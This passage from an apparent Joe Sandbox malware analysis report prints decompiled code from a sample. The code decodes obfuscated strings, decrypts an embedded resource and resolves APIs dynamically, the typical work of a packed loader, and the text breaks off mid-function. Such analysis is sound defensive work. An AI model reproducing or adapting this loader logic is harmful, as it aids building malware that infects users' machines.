                                                                                                                                                                                                      • Instruction Fuzzy Hash: FA31A03190CB588FDB29DF9898596F9BBF1EB65711F00816FD08ED3252CE70A445CB81
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Control-flow Graph

[Control-flow graph for 7ff9a5dc108a omitted; API call shown in the graph: FindCloseChangeNotification]
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000004.00000002.344051468.00007FF9A5DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A5DC0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_7ff9a5dc0000_iGb20db.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ChangeCloseFindNotification
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2591292051-0
                                                                                                                                                                                                      • Opcode ID: 405e434b5850d397baee5c25e05ade60c3fc4e44ac6a6026f9c85a3d1f4e953e
                                                                                                                                                                                                      • Instruction ID: d565606701f0c42c677704ce6aa19d67ce0e973a3365c1562ceafb5033430661
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 405e434b5850d397baee5c25e05ade60c3fc4e44ac6a6026f9c85a3d1f4e953e
                                                                                                                                                                                                      • Instruction Fuzzy Hash: CA31F43090CB889FDB0ADB7898157E97FF0EF57320F04429FD089C31A2DAA96856CB51
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Control-flow Graph (function 4019f0; node legend: Executed / Not Executed)
                                                                                                                                                                                                      C-Code - Quality: 77%
                                                                                                                                                                                                      			E004019F0(void* __edx, void* __eflags) {
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				void* __ebp;
                                                                                                                                                                                                      				void* _t337;
                                                                                                                                                                                                      				void* _t340;
                                                                                                                                                                                                      				int _t341;
                                                                                                                                                                                                      				CHAR* _t344;
                                                                                                                                                                                                      				intOrPtr* _t349;
                                                                                                                                                                                                      				int _t350;
                                                                                                                                                                                                      				long _t352;
                                                                                                                                                                                                      				signed int _t354;
                                                                                                                                                                                                      				intOrPtr _t358;
                                                                                                                                                                                                      				long _t359;
                                                                                                                                                                                                      				CHAR* _t364;
                                                                                                                                                                                                      				struct HINSTANCE__* _t365;
                                                                                                                                                                                                      				CHAR* _t366;
                                                                                                                                                                                                      				_Unknown_base(*)()* _t367;
                                                                                                                                                                                                      				int _t368;
                                                                                                                                                                                                      				int _t369;
                                                                                                                                                                                                      				int _t370;
                                                                                                                                                                                                      				intOrPtr* _t376;
                                                                                                                                                                                                      				int _t378;
                                                                                                                                                                                                      				intOrPtr _t379;
                                                                                                                                                                                                      				intOrPtr* _t381;
                                                                                                                                                                                                      				int _t383;
                                                                                                                                                                                                      				intOrPtr* _t384;
                                                                                                                                                                                                      				int _t385;
                                                                                                                                                                                                      				int _t396;
                                                                                                                                                                                                      				int _t399;
                                                                                                                                                                                                      				int _t402;
                                                                                                                                                                                                      				int _t405;
                                                                                                                                                                                                      				intOrPtr* _t407;
                                                                                                                                                                                                      				int _t413;
                                                                                                                                                                                                      				int _t415;
                                                                                                                                                                                                      				void* _t421;
                                                                                                                                                                                                      				int _t422;
                                                                                                                                                                                                      				int _t424;
                                                                                                                                                                                                      				intOrPtr* _t428;
                                                                                                                                                                                                      				intOrPtr _t429;
                                                                                                                                                                                                      				intOrPtr* _t431;
                                                                                                                                                                                                      				int _t432;
                                                                                                                                                                                                      				int _t435;
                                                                                                                                                                                                      				intOrPtr* _t437;
                                                                                                                                                                                                      				int _t438;
                                                                                                                                                                                                      				intOrPtr* _t439;
                                                                                                                                                                                                      				int _t440;
                                                                                                                                                                                                      				int _t442;
                                                                                                                                                                                                      				signed int _t448;
                                                                                                                                                                                                      				signed int _t451;
                                                                                                                                                                                                      				signed int _t452;
                                                                                                                                                                                                      				int _t469;
                                                                                                                                                                                                      				int _t471;
                                                                                                                                                                                                      				int _t482;
                                                                                                                                                                                                      				signed int _t486;
                                                                                                                                                                                                      				intOrPtr* _t488;
                                                                                                                                                                                                      				intOrPtr* _t490;
                                                                                                                                                                                                      				intOrPtr* _t492;
                                                                                                                                                                                                      				intOrPtr _t493;
                                                                                                                                                                                                      				void* _t494;
                                                                                                                                                                                                      				struct HRSRC__* _t497;
                                                                                                                                                                                                      				void* _t514;
                                                                                                                                                                                                      				int _t519;
                                                                                                                                                                                                      				intOrPtr* _t520;
                                                                                                                                                                                                      				void* _t524;
                                                                                                                                                                                                      				void* _t525;
                                                                                                                                                                                                      				struct HINSTANCE__* _t526;
                                                                                                                                                                                                      				intOrPtr _t527;
                                                                                                                                                                                                      				void* _t531;
                                                                                                                                                                                                      				void* _t535;
                                                                                                                                                                                                      				struct HRSRC__* _t536;
                                                                                                                                                                                                      				intOrPtr* _t537;
                                                                                                                                                                                                      				intOrPtr* _t539;
                                                                                                                                                                                                      				int _t542;
                                                                                                                                                                                                      				int _t543;
                                                                                                                                                                                                      				intOrPtr* _t547;
                                                                                                                                                                                                      				intOrPtr* _t548;
                                                                                                                                                                                                      				intOrPtr* _t549;
                                                                                                                                                                                                      				intOrPtr* _t550;
                                                                                                                                                                                                      				void* _t551;
                                                                                                                                                                                                      				intOrPtr _t552;
                                                                                                                                                                                                      				int _t555;
                                                                                                                                                                                                      				void* _t556;
                                                                                                                                                                                                      				void* _t557;
                                                                                                                                                                                                      				void* _t558;
                                                                                                                                                                                                      				void* _t559;
                                                                                                                                                                                                      				void* _t560;
                                                                                                                                                                                                      				void* _t561;
                                                                                                                                                                                                      				void* _t562;
                                                                                                                                                                                                      				intOrPtr* _t563;
                                                                                                                                                                                                      				void* _t564;
                                                                                                                                                                                                      				void* _t565;
                                                                                                                                                                                                      				void* _t566;
                                                                                                                                                                                                      				void* _t567;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t567 = __eflags;
                                                                                                                                                                                                      				_t494 = __edx;
                                                                                                                                                                                                      				__imp__OleInitialize(0); // executed
                                                                                                                                                                                                      				 *((char*)(_t556 + 0x18)) = 0xe0;
                                                                                                                                                                                                      				 *((char*)(_t556 + 0x19)) = 0x3b;
                                                                                                                                                                                                      				 *((char*)(_t556 + 0x1a)) = 0x8d;
                                                                                                                                                                                                      				 *((char*)(_t556 + 0x1b)) = 0x2a;
                                                                                                                                                                                                      				 *((char*)(_t556 + 0x1c)) = 0xa2;
                                                                                                                                                                                                      				 *((char*)(_t556 + 0x1d)) = 0x2a;
                                                                                                                                                                                                      				 *((char*)(_t556 + 0x1e)) = 0x2a;
                                                                                                                                                                                                      				 *((char*)(_t556 + 0x1f)) = 0x41;
                                                                                                                                                                                                      				 *((char*)(_t556 + 0x20)) = 0xd3;
                                                                                                                                                                                                      				 *((char*)(_t556 + 0x21)) = 0x20;
                                                                                                                                                                                                      				 *((char*)(_t556 + 0x22)) = 0x64;
                                                                                                                                                                                                      				 *((char*)(_t556 + 0x23)) = 6;
                                                                                                                                                                                                      				 *((char*)(_t556 + 0x24)) = 0x8a;
                                                                                                                                                                                                      				 *((char*)(_t556 + 0x25)) = 0xf7;
                                                                                                                                                                                                      				 *((char*)(_t556 + 0x26)) = 0x3d;
                                                                                                                                                                                                      				 *((char*)(_t556 + 0x27)) = 0x9d;
                                                                                                                                                                                                      				 *((char*)(_t556 + 0x28)) = 0xd9;
                                                                                                                                                                                                      				 *((char*)(_t556 + 0x29)) = 0xee;
                                                                                                                                                                                                      				 *((char*)(_t556 + 0x2a)) = 0x15;
                                                                                                                                                                                                      				 *((char*)(_t556 + 0x2b)) = 0x68;
                                                                                                                                                                                                      				 *((char*)(_t556 + 0x2c)) = 0xf4;
                                                                                                                                                                                                      				 *((char*)(_t556 + 0x2d)) = 0x76;
                                                                                                                                                                                                      				 *((char*)(_t556 + 0x2e)) = 0xb9;
                                                                                                                                                                                                      				 *((char*)(_t556 + 0x2f)) = 0x34;
                                                                                                                                                                                                      				 *((char*)(_t556 + 0x30)) = 0xbf;
                                                                                                                                                                                                      				 *((char*)(_t556 + 0x31)) = 0x1e;
                                                                                                                                                                                                      				 *((char*)(_t556 + 0x32)) = 0xe7;
                                                                                                                                                                                                      				 *((char*)(_t556 + 0x33)) = 0x78;
                                                                                                                                                                                                      				 *((char*)(_t556 + 0x34)) = 0x98;
                                                                                                                                                                                                      				 *((char*)(_t556 + 0x35)) = 0xe9;
                                                                                                                                                                                                      				 *((char*)(_t556 + 0x36)) = 0x6f;
                                                                                                                                                                                                      				 *((char*)(_t556 + 0x37)) = 0xb4;
                                                                                                                                                                                                      				 *((char*)(_t556 + 0x38)) = 0;
                                                                                                                                                                                                      				_push(E00401650(_t556 + 0x14, _t556 + 0x114));
                                                                                                                                                                                                      				_t337 = E0040B99E(0, _t494, _t524, _t535, _t567);
                                                                                                                                                                                                      				_t557 = _t556 + 0xc;
                                                                                                                                                                                                      				if(_t337 == 0x41b2a0) {
                                                                                                                                                                                                      					L80:
                                                                                                                                                                                                      					__eflags = 0;
                                                                                                                                                                                                      					return 0;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_t340 = CreateToolhelp32Snapshot(8, GetCurrentProcessId()); // executed
                                                                                                                                                                                                      					_t525 = _t340;
                                                                                                                                                                                                      					 *((intOrPtr*)(_t557 + 0x280)) = 0x224;
                                                                                                                                                                                                      					 *((char*)(_t557 + 0x64)) = 0xce;
                                                                                                                                                                                                      					 *((char*)(_t557 + 0x65)) = 0x27;
                                                                                                                                                                                                      					 *((char*)(_t557 + 0x66)) = 0x9c;
                                                                                                                                                                                                      					 *((char*)(_t557 + 0x67)) = 0x1a;
                                                                                                                                                                                                      					 *((char*)(_t557 + 0x68)) = 0x95;
                                                                                                                                                                                                      					 *((char*)(_t557 + 0x69)) = 0x2e;
                                                                                                                                                                                                      					 *((char*)(_t557 + 0x6a)) = 0x22;
                                                                                                                                                                                                      					 *((char*)(_t557 + 0x6b)) = 0x57;
                                                                                                                                                                                                      					 *((char*)(_t557 + 0x6c)) = 0x91;
                                                                                                                                                                                                      					 *((char*)(_t557 + 0x6d)) = 0x21;
                                                                                                                                                                                                      					 *((char*)(_t557 + 0x6e)) = 0x57;
                                                                                                                                                                                                      					 *((char*)(_t557 + 0x6f)) = 0x3a;
                                                                                                                                                                                                      					 *((char*)(_t557 + 0x70)) = 0xf8;
                                                                                                                                                                                                      					 *((char*)(_t557 + 0x71)) = 0x98;
                                                                                                                                                                                                      					 *((char*)(_t557 + 0x72)) = 0x5b;
                                                                                                                                                                                                      					 *((char*)(_t557 + 0x73)) = 0xf4;
                                                                                                                                                                                                      					 *((char*)(_t557 + 0x74)) = 0xb5;
                                                                                                                                                                                                      					 *((char*)(_t557 + 0x75)) = 0x87;
                                                                                                                                                                                                      					 *((char*)(_t557 + 0x76)) = 0x7b;
                                                                                                                                                                                                      					 *((char*)(_t557 + 0x77)) = 0xf;
                                                                                                                                                                                                      					 *((char*)(_t557 + 0x78)) = 0xf4;
                                                                                                                                                                                                      					 *((char*)(_t557 + 0x79)) = 0x76;
                                                                                                                                                                                                      					 *((char*)(_t557 + 0x7a)) = 0xb9;
                                                                                                                                                                                                      					 *((char*)(_t557 + 0x7b)) = 0x34;
                                                                                                                                                                                                      					 *((char*)(_t557 + 0x7c)) = 0xbf;
                                                                                                                                                                                                      					 *((char*)(_t557 + 0x7d)) = 0x1e;
                                                                                                                                                                                                      					 *((char*)(_t557 + 0x7e)) = 0xe7;
                                                                                                                                                                                                      					 *((char*)(_t557 + 0x7f)) = 0x78;
                                                                                                                                                                                                      					 *((char*)(_t557 + 0x80)) = 0x98;
                                                                                                                                                                                                      					 *((char*)(_t557 + 0x81)) = 0xe9;
                                                                                                                                                                                                      					 *((char*)(_t557 + 0x82)) = 0x6f;
                                                                                                                                                                                                      					 *((char*)(_t557 + 0x83)) = 0xb4;
                                                                                                                                                                                                      					 *((char*)(_t557 + 0x84)) = 0;
                                                                                                                                                                                                      					 *((char*)(_t557 + 0x18)) = 0xc0;
                                                                                                                                                                                                      					 *((char*)(_t557 + 0x19)) = 0x38;
                                                                                                                                                                                                      					 *((char*)(_t557 + 0x1a)) = 0x8d;
                                                                                                                                                                                                      					 *((char*)(_t557 + 0x1b)) = 0x1f;
                                                                                                                                                                                                      					 *((char*)(_t557 + 0x1c)) = 0x8e;
                                                                                                                                                                                                      					 *((char*)(_t557 + 0x1d)) = 0x30;
                                                                                                                                                                                                      					 *((char*)(_t557 + 0x1e)) = 0x65;
                                                                                                                                                                                                      					 *((char*)(_t557 + 0x1f)) = 0x47;
                                                                                                                                                                                                      					 *((char*)(_t557 + 0x20)) = 0xd3;
                                                                                                                                                                                                      					 *((char*)(_t557 + 0x21)) = 0x29;
                                                                                                                                                                                                      					 *((char*)(_t557 + 0x22)) = 0x3b;
                                                                                                                                                                                                      					 *((char*)(_t557 + 0x23)) = 0x56;
                                                                                                                                                                                                      					 *((char*)(_t557 + 0x24)) = 0xf8;
                                                                                                                                                                                                      					 *((char*)(_t557 + 0x25)) = 0x98;
                                                                                                                                                                                                      					 *((char*)(_t557 + 0x26)) = 0x5b;
                                                                                                                                                                                                      					 *((char*)(_t557 + 0x27)) = 0xf4;
                                                                                                                                                                                                      					 *((char*)(_t557 + 0x28)) = 0xb5;
                                                                                                                                                                                                      					 *((char*)(_t557 + 0x29)) = 0x87;
                                                                                                                                                                                                      					 *((char*)(_t557 + 0x2a)) = 0x7b;
                                                                                                                                                                                                      					 *((char*)(_t557 + 0x2b)) = 0xf;
                                                                                                                                                                                                      					 *((char*)(_t557 + 0x2c)) = 0xf4;
                                                                                                                                                                                                      					 *((char*)(_t557 + 0x2d)) = 0x76;
                                                                                                                                                                                                      					 *((char*)(_t557 + 0x2e)) = 0xb9;
                                                                                                                                                                                                      					 *((char*)(_t557 + 0x2f)) = 0x34;
                                                                                                                                                                                                      					 *((char*)(_t557 + 0x30)) = 0xbf;
                                                                                                                                                                                                      					 *((char*)(_t557 + 0x31)) = 0x1e;
                                                                                                                                                                                                      					 *((char*)(_t557 + 0x32)) = 0xe7;
                                                                                                                                                                                                      					 *((char*)(_t557 + 0x33)) = 0x78;
                                                                                                                                                                                                      					 *((char*)(_t557 + 0x34)) = 0x98;
                                                                                                                                                                                                      					 *((char*)(_t557 + 0x35)) = 0xe9;
                                                                                                                                                                                                      					 *((char*)(_t557 + 0x36)) = 0x6f;
                                                                                                                                                                                                      					 *((char*)(_t557 + 0x37)) = 0xb4;
                                                                                                                                                                                                      					 *((char*)(_t557 + 0x38)) = 0;
                                                                                                                                                                                                      					_t341 = Module32First(_t525, _t557 + 0x278); // executed
                                                                                                                                                                                                      					if(_t341 == 0) {
                                                                                                                                                                                                      						L38:
                                                                                                                                                                                                      						FindCloseChangeNotification(_t525); // executed
                                                                                                                                                                                                      						_t526 = GetModuleHandleA(0);
                                                                                                                                                                                                      						 *((char*)(_t557 + 0x1c)) = 0xfc;
                                                                                                                                                                                                      						 *((char*)(_t557 + 0x1d)) = 0xb;
                                                                                                                                                                                                      						 *((char*)(_t557 + 0x1e)) = 0xff;
                                                                                                                                                                                                      						 *((char*)(_t557 + 0x1f)) = 0x75;
                                                                                                                                                                                                      						 *((char*)(_t557 + 0x20)) = 0xe7;
                                                                                                                                                                                                      						 *((char*)(_t557 + 0x21)) = 0x44;
                                                                                                                                                                                                      						 *((char*)(_t557 + 0x22)) = 0x4b;
                                                                                                                                                                                                      						 *((char*)(_t557 + 0x23)) = 0x23;
                                                                                                                                                                                                      						 *((char*)(_t557 + 0x24)) = 0xbf;
                                                                                                                                                                                                      						 *((char*)(_t557 + 0x25)) = 0x45;
                                                                                                                                                                                                      						 *((char*)(_t557 + 0x26)) = 0x3b;
                                                                                                                                                                                                      						 *((char*)(_t557 + 0x27)) = 0x56;
                                                                                                                                                                                                      						 *((char*)(_t557 + 0x28)) = 0xf8;
                                                                                                                                                                                                      						 *((char*)(_t557 + 0x29)) = 0x98;
                                                                                                                                                                                                      						 *((char*)(_t557 + 0x2a)) = 0x5b;
                                                                                                                                                                                                      						 *((char*)(_t557 + 0x2b)) = 0xf4;
                                                                                                                                                                                                      						 *((char*)(_t557 + 0x2c)) = 0xb5;
                                                                                                                                                                                                      						 *((char*)(_t557 + 0x2d)) = 0x87;
                                                                                                                                                                                                      						 *((char*)(_t557 + 0x2e)) = 0x7b;
                                                                                                                                                                                                      						 *((char*)(_t557 + 0x2f)) = 0xf;
                                                                                                                                                                                                      						 *((char*)(_t557 + 0x30)) = 0xf4;
                                                                                                                                                                                                      						 *((char*)(_t557 + 0x31)) = 0x76;
                                                                                                                                                                                                      						 *((char*)(_t557 + 0x32)) = 0xb9;
                                                                                                                                                                                                      						 *((char*)(_t557 + 0x33)) = 0x34;
                                                                                                                                                                                                      						 *((char*)(_t557 + 0x34)) = 0xbf;
                                                                                                                                                                                                      						 *((char*)(_t557 + 0x35)) = 0x1e;
                                                                                                                                                                                                      						 *((char*)(_t557 + 0x36)) = 0xe7;
                                                                                                                                                                                                      						 *((char*)(_t557 + 0x37)) = 0x78;
                                                                                                                                                                                                      						 *((char*)(_t557 + 0x38)) = 0x98;
                                                                                                                                                                                                      						 *((char*)(_t557 + 0x39)) = 0xe9;
                                                                                                                                                                                                      						 *((char*)(_t557 + 0x3a)) = 0x6f;
                                                                                                                                                                                                      						 *((char*)(_t557 + 0x3b)) = 0xb4;
                                                                                                                                                                                                      						 *((char*)(_t557 + 0x3c)) = 0;
                                                                                                                                                                                                      						_t344 = E00401650(_t557 + 0x18, _t557 + 0x158);
                                                                                                                                                                                                      						_t558 = _t557 + 8;
                                                                                                                                                                                                      						_t536 = FindResourceA(_t526, _t344, 0xa);
                                                                                                                                                                                                      						 *(_t558 + 0x50) = _t536;
                                                                                                                                                                                                      						_t551 = LoadResource(_t526, _t536);
                                                                                                                                                                                                      						 *((intOrPtr*)(_t558 + 0x44)) = LockResource(_t551);
                                                                                                                                                                                                      						_t349 = E0040B84D(0, _t557 + 0x18, _t526, SizeofResource(_t526, _t536)); // executed
                                                                                                                                                                                                      						_push(0x40022);
                                                                                                                                                                                                      						_t537 = _t349; // executed
                                                                                                                                                                                                      						_t350 = E0040AF66(0, _t526, __eflags); // executed
                                                                                                                                                                                                      						_t559 = _t558 + 8;
                                                                                                                                                                                                      						 *(_t559 + 0x34) = _t350;
                                                                                                                                                                                                      						__eflags = _t350;
                                                                                                                                                                                                      						if(_t350 == 0) {
                                                                                                                                                                                                      							 *(_t559 + 0x50) = 0;
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							E0040BA30(_t526, _t350, 0, 0x40022);
                                                                                                                                                                                                      							_t486 =  *(_t559 + 0x40);
                                                                                                                                                                                                      							_t559 = _t559 + 0xc;
                                                                                                                                                                                                      							 *(_t559 + 0x50) = _t486;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						E00401300( *(_t559 + 0x50));
                                                                                                                                                                                                      						_t497 =  *(_t559 + 0x48);
                                                                                                                                                                                                      						_t352 = SizeofResource(_t526, _t497);
                                                                                                                                                                                                      						 *(_t559 + 0x40) = _t352;
                                                                                                                                                                                                      						asm("cdq");
                                                                                                                                                                                                      						_t354 = _t352 + (_t497 & 0x000003ff) >> 0xa;
                                                                                                                                                                                                      						__eflags = _t354;
                                                                                                                                                                                                      						if(_t354 > 0) {
                                                                                                                                                                                                      							_t519 =  *(_t559 + 0x3c);
                                                                                                                                                                                                      							_t482 = _t537 - _t519;
                                                                                                                                                                                                      							__eflags = _t482;
                                                                                                                                                                                                      							 *(_t559 + 0x34) = _t519;
                                                                                                                                                                                                      							 *(_t559 + 0x88) = _t482;
                                                                                                                                                                                                      							 *(_t559 + 0x38) = _t354;
                                                                                                                                                                                                      							do {
                                                                                                                                                                                                      								_t424 =  *(_t559 + 0x34);
                                                                                                                                                                                                      								_push( *(_t559 + 0x88) + _t424);
                                                                                                                                                                                                      								_push(0x400);
                                                                                                                                                                                                      								_push(_t424);
                                                                                                                                                                                                      								E00401560(0,  *((intOrPtr*)(_t559 + 0x54)));
                                                                                                                                                                                                      								 *(_t559 + 0x34) =  *(_t559 + 0x34) + 0x400;
                                                                                                                                                                                                      								_t179 = _t559 + 0x38;
                                                                                                                                                                                                      								 *_t179 =  *(_t559 + 0x38) - 1;
                                                                                                                                                                                                      								__eflags =  *_t179;
                                                                                                                                                                                                      							} while ( *_t179 != 0);
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t448 =  *(_t559 + 0x40) & 0x800003ff;
                                                                                                                                                                                                      						__eflags = _t448;
                                                                                                                                                                                                      						if(_t448 < 0) {
                                                                                                                                                                                                      							_t448 = (_t448 - 0x00000001 | 0xfffffc00) + 1;
                                                                                                                                                                                                      							__eflags = _t448;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						__eflags = _t448;
                                                                                                                                                                                                      						if(_t448 > 0) {
                                                                                                                                                                                                      							_t421 =  *(_t559 + 0x40) - _t448;
                                                                                                                                                                                                      							_push(_t421 + _t537);
                                                                                                                                                                                                      							_push(_t448);
                                                                                                                                                                                                      							_t422 = _t421 +  *((intOrPtr*)(_t559 + 0x44));
                                                                                                                                                                                                      							__eflags = _t422;
                                                                                                                                                                                                      							_push(_t422);
                                                                                                                                                                                                      							E00401560(0,  *((intOrPtr*)(_t559 + 0x58)));
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						E0040BA30(_t526,  *(_t559 + 0x3c), 0,  *(_t559 + 0x40));
                                                                                                                                                                                                      						_t560 = _t559 + 0xc;
                                                                                                                                                                                                      						FreeResource(_t551);
                                                                                                                                                                                                      						_t552 =  *_t537;
                                                                                                                                                                                                      						 *((intOrPtr*)(_t560 + 0x94)) = _t552;
                                                                                                                                                                                                      						_t358 = E0040B84D(0,  *(_t559 + 0x40), _t526, _t552); // executed
                                                                                                                                                                                                      						_t561 = _t560 + 4;
                                                                                                                                                                                                      						 *((intOrPtr*)(_t561 + 0x40)) = _t358;
                                                                                                                                                                                                      						_t359 = SizeofResource(_t526,  *(_t560 + 0x4c));
                                                                                                                                                                                                      						_t527 =  *((intOrPtr*)(_t561 + 0x38));
                                                                                                                                                                                                      						_t192 = _t537 + 4; // 0x4
                                                                                                                                                                                                      						E0040AC60(_t527, _t561 + 0x98, _t192, _t359);
                                                                                                                                                                                                      						E0040BA30(_t527, _t537, 0,  *((intOrPtr*)(_t561 + 0x50)));
                                                                                                                                                                                                      						_t528 = _t527 + 0xe;
                                                                                                                                                                                                      						 *((char*)(_t561 + 0x34)) = 0xce;
                                                                                                                                                                                                      						 *((char*)(_t561 + 0x35)) = 0x27;
                                                                                                                                                                                                      						 *((char*)(_t561 + 0x36)) = 0x9c;
                                                                                                                                                                                                      						 *((char*)(_t561 + 0x37)) = 0x1a;
                                                                                                                                                                                                      						 *((char*)(_t561 + 0x38)) = 0x95;
                                                                                                                                                                                                      						 *((char*)(_t561 + 0x39)) = 0x21;
                                                                                                                                                                                                      						 *((char*)(_t561 + 0x3a)) = 0x2e;
                                                                                                                                                                                                      						 *((char*)(_t561 + 0x3b)) = 0xd;
                                                                                                                                                                                                      						 *((char*)(_t561 + 0x3c)) = 0xdb;
                                                                                                                                                                                                      						 *((char*)(_t561 + 0x3d)) = 0x29;
                                                                                                                                                                                                      						 *((char*)(_t561 + 0x3e)) = 0x57;
                                                                                                                                                                                                      						 *((char*)(_t561 + 0x3f)) = 0x56;
                                                                                                                                                                                                      						 *((char*)(_t561 + 0x40)) = 0xf8;
                                                                                                                                                                                                      						 *((char*)(_t561 + 0x41)) = 0x98;
                                                                                                                                                                                                      						 *((char*)(_t561 + 0x42)) = 0x5b;
                                                                                                                                                                                                      						 *((char*)(_t561 + 0x43)) = 0xf4;
                                                                                                                                                                                                      						 *((char*)(_t561 + 0x44)) = 0xb5;
                                                                                                                                                                                                      						 *((char*)(_t561 + 0x45)) = 0x87;
                                                                                                                                                                                                      						 *((char*)(_t561 + 0x46)) = 0x7b;
                                                                                                                                                                                                      						 *((char*)(_t561 + 0x47)) = 0xf;
                                                                                                                                                                                                      						 *((char*)(_t561 + 0x48)) = 0xf4;
                                                                                                                                                                                                      						 *((char*)(_t561 + 0x49)) = 0x76;
                                                                                                                                                                                                      						 *((char*)(_t561 + 0x4a)) = 0xb9;
                                                                                                                                                                                                      						 *((char*)(_t561 + 0x4b)) = 0x34;
                                                                                                                                                                                                      						 *((char*)(_t561 + 0x4c)) = 0xbf;
                                                                                                                                                                                                      						 *((char*)(_t561 + 0x4d)) = 0x1e;
                                                                                                                                                                                                      						 *((char*)(_t561 + 0x4e)) = 0xe7;
                                                                                                                                                                                                      						 *((char*)(_t561 + 0x4f)) = 0x78;
                                                                                                                                                                                                      						 *((char*)(_t561 + 0x50)) = 0x98;
                                                                                                                                                                                                      						 *((char*)(_t561 + 0x51)) = 0xe9;
                                                                                                                                                                                                      						 *((char*)(_t561 + 0x52)) = 0x6f;
                                                                                                                                                                                                      						 *((char*)(_t561 + 0x53)) = 0xb4;
                                                                                                                                                                                                      						 *((char*)(_t561 + 0x54)) = 0;
                                                                                                                                                                                                      						_t364 = E00401650(_t561 + 0x30, _t561 + 0x110);
                                                                                                                                                                                                      						_t562 = _t561 + 0x24;
                                                                                                                                                                                                      						_t365 = LoadLibraryA(_t364); // executed
                                                                                                                                                                                                      						_t538 = _t365;
                                                                                                                                                                                                      						 *((char*)(_t562 + 0x10)) = 0xe0;
                                                                                                                                                                                                      						 *((char*)(_t562 + 0x11)) = 0x18;
                                                                                                                                                                                                      						 *((char*)(_t562 + 0x12)) = 0xad;
                                                                                                                                                                                                      						 *((char*)(_t562 + 0x13)) = 0x36;
                                                                                                                                                                                                      						 *((char*)(_t562 + 0x14)) = 0x95;
                                                                                                                                                                                                      						 *((char*)(_t562 + 0x15)) = 0x21;
                                                                                                                                                                                                      						_t451 = _t562 + 0x134;
                                                                                                                                                                                                      						 *((char*)(_t562 + 0x1e)) = 0x2a;
                                                                                                                                                                                                      						 *((char*)(_t562 + 0x1f)) = 0x57;
                                                                                                                                                                                                      						 *((char*)(_t562 + 0x20)) = 0xda;
                                                                                                                                                                                                      						 *((char*)(_t562 + 0x21)) = 0xc;
                                                                                                                                                                                                      						 *((char*)(_t562 + 0x22)) = 0x55;
                                                                                                                                                                                                      						 *((char*)(_t562 + 0x23)) = 0x25;
                                                                                                                                                                                                      						 *((char*)(_t562 + 0x24)) = 0x8c;
                                                                                                                                                                                                      						 *((char*)(_t562 + 0x25)) = 0xf9;
                                                                                                                                                                                                      						 *((char*)(_t562 + 0x26)) = 0x35;
                                                                                                                                                                                                      						 *((char*)(_t562 + 0x27)) = 0x97;
                                                                                                                                                                                                      						 *((char*)(_t562 + 0x28)) = 0xd0;
                                                                                                                                                                                                      						 *((char*)(_t562 + 0x29)) = 0x87;
                                                                                                                                                                                                      						 *((char*)(_t562 + 0x2a)) = 0x7b;
                                                                                                                                                                                                      						 *((char*)(_t562 + 0x2b)) = 0xf;
                                                                                                                                                                                                      						 *((char*)(_t562 + 0x2c)) = 0xf4;
                                                                                                                                                                                                      						 *((char*)(_t562 + 0x2d)) = 0x76;
                                                                                                                                                                                                      						 *((char*)(_t562 + 0x2e)) = 0xb9;
                                                                                                                                                                                                      						 *((char*)(_t562 + 0x2f)) = 0x34;
                                                                                                                                                                                                      						 *((char*)(_t562 + 0x30)) = 0xbf;
                                                                                                                                                                                                      						 *((char*)(_t562 + 0x31)) = 0x1e;
						 *((char*)(_t562 + 0x32)) = 0xe7;
						 *((char*)(_t562 + 0x33)) = 0x78;
						 *((char*)(_t562 + 0x34)) = 0x98;
						 *((char*)(_t562 + 0x35)) = 0xe9;
						 *((char*)(_t562 + 0x36)) = 0x6f;
						 *((char*)(_t562 + 0x37)) = 0xb4;
						 *((char*)(_t562 + 0x38)) = 0;
						_t366 = E00401650(_t562 + 0x14, _t451);
						_t563 = _t562 + 8;
						_t367 = GetProcAddress(_t365, _t366);
						__eflags = _t367;
						_t452 = _t451 & 0xffffff00 | _t367 != 0x00000000;
						__eflags = _t452;
						 *(_t563 + 0x47) = _t452 == 0;
						 *0x423480 = _t367;
						 *((intOrPtr*)(_t563 + 0x80)) = 0;
						 *((intOrPtr*)(_t563 + 0x84)) = 0;
						 *((intOrPtr*)(_t563 + 0x4c)) = 0;
						 *(_t563 + 0x58) = 0;
						 *(_t563 + 0x54) = 0;
						__eflags = _t452;
						if(_t452 != 0) {
							_t368 =  *_t367(0x41b230, 0x41b220, _t563 + 0x80); // executed
							__eflags = _t368;
							if(_t368 >= 0) {
								__eflags =  *(_t563 + 0x47);
								if( *(_t563 + 0x47) == 0) {
									 *((intOrPtr*)(_t563 + 0x17c)) = _t563 + 0x17c;
									E004018F0( *((intOrPtr*)(_t563 + 0x38)), _t563 + 0x17c, _t563 + 0x17c,  *((intOrPtr*)(_t563 + 0x38)), 3);
									_t376 =  *((intOrPtr*)(_t563 + 0x80));
									_t378 =  *((intOrPtr*)( *((intOrPtr*)( *_t376 + 0xc))))(_t376,  *((intOrPtr*)(_t563 + 0x178)), 0x41b240, _t563 + 0x84); // executed
									__eflags = _t378;
									if(_t378 >= 0) {
										_t381 =  *((intOrPtr*)(_t563 + 0x84));
										_t383 =  *((intOrPtr*)( *((intOrPtr*)( *_t381 + 0x24))))(_t381, 0x41b210, 0x41b290, _t563 + 0x4c); // executed
										__eflags = _t383;
										if(_t383 >= 0) {
											_t384 =  *((intOrPtr*)(_t563 + 0x4c));
											_t385 =  *((intOrPtr*)( *((intOrPtr*)( *_t384 + 0x28))))(_t384); // executed
